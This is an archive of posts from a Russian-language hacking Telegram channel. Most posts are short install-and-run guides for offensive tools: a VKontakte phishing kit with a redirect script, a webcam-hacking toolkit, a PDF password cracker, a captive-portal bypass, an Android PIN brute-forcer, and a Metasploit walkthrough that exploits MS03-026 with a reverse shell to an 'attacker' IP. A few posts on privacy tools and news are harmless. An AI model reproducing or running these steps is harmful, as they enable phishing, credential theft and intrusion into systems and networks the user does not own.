Dark Color 2.0
Closed channel
Статьи по хакингу,защите информации, а также новости в мире IB и многое другое. Связь - @darkclrbot Ссылка на каналы: @darkcolor Вся информация предоставлена в целях обучения и осведомления. Мы никого не призываем к неправомерным поступкам.
Show more1 542
Subscribers
No data24 hours
+17 days
-2530 days
Posts Archive
1 542
OSINT в термукс
OSINT (англ. Open source intelligence)– сбор информации и анализ разведданных на основании открытых источников
Опции:
Сканирование инстаграм
Сканирование номера телефона
Поиск имени пользователя в социальных сетях
Поиск в интернете
Установка:
▪️pkg upgrade
▪️pkg install git python
▪️git clone https://github.com/Deadshot0x7/007-TheBond
▪️cd 007-TheBond
▪️python -m venv venv
▪️source venv/bin/activate
▪️./setup.sh
Запуск:
▪️python 007-TheBond.py
Далее вам необходимо выбрать опцию, которые написаны выше, и заполнить форму, а дальше ждать результатов.
#osint #Termux
1 542
❗️Tor официально заблокирован в России
В ответ на это разработчики выпустили обращение с призывом поднимать у себя серверы.
1 542
Фишинг «Вконтакте» в Termux
Robophish — лучшая утилита для фишинга Вк.
Установка:
$ git clone https://github.com/gasayminajj/robophish
$ cd robophish
Переходим в HTML редатор и добавляем туда скрипт редиректа на наш сайт.
<head>
<meta http-equiv="refresh" content="1;URL=ссылка" />
</head>
Запуск:
$ bash robophish.sh
#Termux
1 542
Infinity Search — метапоисковая система, ориентированная на приватность. Открытый исходный код.
Работает так же, как DuckDuckGo. Он бесплатен и финансируется за счет рекламы без отслеживания и партнерских ссылок.
#сайт #сервис
1 542
Системные команды Termux
Часто пользователи #termux не предают значения этим командам, считая что они "бесполезные", но я, скажу вам, что данные команды могут пригодиться при оформлении вашего термукс терминала с нуля.
▪️
date - вывести текущую дату и время
▪️cal - вывести календарь на текущий месяц
▪️uptime - показать текущее время
▪️whoami - имя, под которым вы в системе
▪️uname -a - показать информацию о ядре
▪️cat / proc / cpuinfo - информация ЦПУ
▪️cat / proc / meminfo - информация о памяти
▪️man command - показать мануал для command
▪️df - показать инф. о памяти дисков
▪️du - вывести« вес »текущего каталога
▪️free - использование памяти и swap
▪️whereis app - возможное расположение программы app
▪️which app - какое приложение будет запущено по умолчанию1 542
Инструмент для массового тестирования вебкамер
Entropy Toolkit — мощная утилита для пентестинга вебкамер. Может работать как "точечно", так и искать их через shodan.
Установка
$ pip install tailer
$ git clone https://github.com/evildevill/entropy
$ cd entropy
$ chmod +x install.sh
$ ./install.sh
Использование
$ python3 entropy -h
https://github.com/evildevill/entropy
#пенстест #полезное
1 542
Для обладателей Root-прав на устройстве❗️
Ни при каких обстоятельствах не обновляйте Magisk на крайнюю версию Canary (23010). Полно багов и жалоб. При попытке отката многие устройства уходят в ботлуп. При попытке удаления uninstaller'om слетает кастомное рекавери.
1 542
Metasploit: Framework
C помощью которого вы сможете проникнуть, конечно же, в свой ПК.
Установка и запуск:
▪️
pkg update
▪️ pkg install unstable-repo
▪️ pkg install metasploit
▪️ msfconsole
▪️ db_status
▪️ git init
▪️ use auxiliary/scanner/portscan/tcp
▪️set PORTS 1-5000
▪️ set RHOSTS 192.168.88.161
▪️ run
▪️ search dcom
▪️ use exploit/windows/dcerpc/ms03_026_dcom
▪️ set payload windows/shell_reverse_tcp
▪️ show options
▪️ set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)
▪️ set LHOST 192.168.88.247 - IP злоумышленника
▪️ run
▪️ cd ..\..\
▪️ echo Hello!1 542
ButterCup — это кроссплатформенный менеджер паролей с открытым исходным кодом, написанный на NodeJS с Typescript.
Использует AES256 шифрование для защиты ваших паролей и учетных данных в файлах хранилища.
Хранилища можно загружать и сохранять в нескольких источниках, таких как локальная файловая система, Dropbox, Google Диск или любая служба с поддержкой WebDAV (например, ownCloud).
1 542
Взлом любого PDF-файла защищённого паролем
Многие люди хранят на своих компьютерах конфиденциальную информацию, и они не хотят, чтобы она попала в чужие руки. Чтобы защитить эти данные, мы шифруем файлы, используя защищенный паролем формат PDF. На данный момент шифрование не так безопасно, как могло бы быть, потому что файлы PDF можно расшифровать.
pdfcrack — продвинутый инструмент для взлома любых PDF-файлов, защищенных паролем . Очень простой в использовании скрипт, особенно для начинающих хакеров.
Установка
sudo apt-get update -y
git clone https://github.com/machine1337/pdfcrack.git
cd pdfcrack && chmod +x crack.sh
sudo bash crack.sh
После завершения проверки программа отобразит удобный интерфейс. Укажите путь к зашифрованному файл PDF, и выберите тип атаки и с хорошим словарем вы можете получить пароль от PDF файла ✌️1 542
Халявный Wi-Fi.
В повседневной жизни мы часто сталкиваемся с ситуацией, когда необходимо получить доступ в интернет. В кафе, ресторане или в общественном месте всегда можно найти точку доступа. Нередко попадаются роутеры с «гостевым доступом». Но бывает, что бесплатный Wi-Fi защищен Captive Portal.
Иными словами, имеется открытая сеть Wi-Fi, к которой можно подключиться без пароля, но при попытке зайти на любой сайт, нас будет перебрасывать на страницу, где нужно ввести учётные данные, оплатить, подтвердить номер телефона с помощью СМС или что-то похожее. Но есть утилита для обхода данной фичи.
Установка:
▪️
apt update && apt upgrade -y
▪️apt -y install sipcalc nmap wget
▪️wget https://raw.githubusercontent.com/systematicat/hack-captive-portals/master/hack-captive.sh
▪️chmod u+x hack-captive.sh
▪️./hack-captive.sh
После фразы "Pwned! Now you can surf the Internet!", вы можете спокойно пользоваться интернетом.1 542
WhatsApp: «Мы в курсе, что некоторые пользователи испытывают трудности с WhatsApp в настоящий момент. Мы работаем над тем, чтоб вернуть все в норму и сразу же вас проинформируем.
Спасибо за терпение!»
Даниэль: «Telegram, у тебя кто-нибудь есть?»
Telegram: «Приходи. Сервера работают, а родителей нет дома»
🤣🤣🤣🤣🤣
1 542
Как ограничить сбор данных у приложений
Практически каждое приложение для Android отправляет различную информацию для осуществления сбора данных о пользователе. Если это никак не контролировать, то приложение будет делать это бесконечно.
Приложение Tracker Control может ограничить права сторонних программ. Работает оно при помощи модуля VPN. Установите приложение и ограничьте права у установленных программ.
Например, можно запретить выход в сеть. Также, программа обнаруживает трекеры в коде приложений и может ограничить их работу, если включить соответствующую функцию.
#приватность #android
1 542
Файл hosts.txt
В операционных системах существует адресация серверов, которая работает поверх DNS. Это позволяет администратору устройства выставлять свою адресацию необходимых узлов.
Файл hosts содержит адреса и параметры для определения источника. Когда компьютер обращается к DNS серверу, адреса файла hosts имеют приоритет, потому адресация будет выполнена согласно локальным указаниям.
Это позволяет формировать собственную сеть, блокировать нежелательные сайты, а также ограничивать приложениям доступ в интернет. Например, если они пиратские. Многие системы взлома программного обеспечения вносят адреса серверов проверки подлинности ПО в файл hosts.
Как пользоваться
В системах Windows файл hosts.txt находится в %SystemRoot%\system32\drivers\etc\hosts. Его формат представляет собой текстовый файл, в котором хранятся парные адреса. Первый — к которому обращаемся, второй — куда перенаправляем. Если вы хотите заблокировать адрес, достаточно перенаправить его на 0.0.0.0.
#ликбез
1 542
Взламываем пароль на Android-смартфоне с помощью брутфорс-атаки
Перед вами отличная возможность разблокировать устройство Android путём подбора PIN-кода на заблокированном экране. Превратите свой телефон Kali Nethunter во взломщик PIN-кодов для устройств Android!
Android-PIN-Bruteforce использует кабель USB OTG для подключения заблокированного телефона к устройству Nethunter. Он имитирует клавиатуру, автоматически пробует ПИН-коды и ждёт после того, как попробует слишком много неправильных догадок.
https://github.com/urbanadventurer/Android-PIN-Bruteforce
1 542
Как обманывают системы распознавания лиц
Подобные системы получаю повсеместное внедрение, и многие злоумышленники находят новые и новые способы защиты от них. Для некоторых даже не нужно скрывать лицо.
Часть из них базируется на видоизменение лица, например, с помощью масок с глазами ниже обычных. Это уже не распознается как лицо.
Другая же часть базируется на переизбытке информации, когда лиц много, понять какое из них настоящее тоже невозможно. Смотрите прикрепленные фотографии.
Система не интуитивна и еще не идеальна, а потому обмануть ее достаточно просто.
Существуют также девайсы, создающие инфракрасное излучение перед лицом. Мы его не видим, однако, камеры видят и никак не могут разглядеть человека за ним.
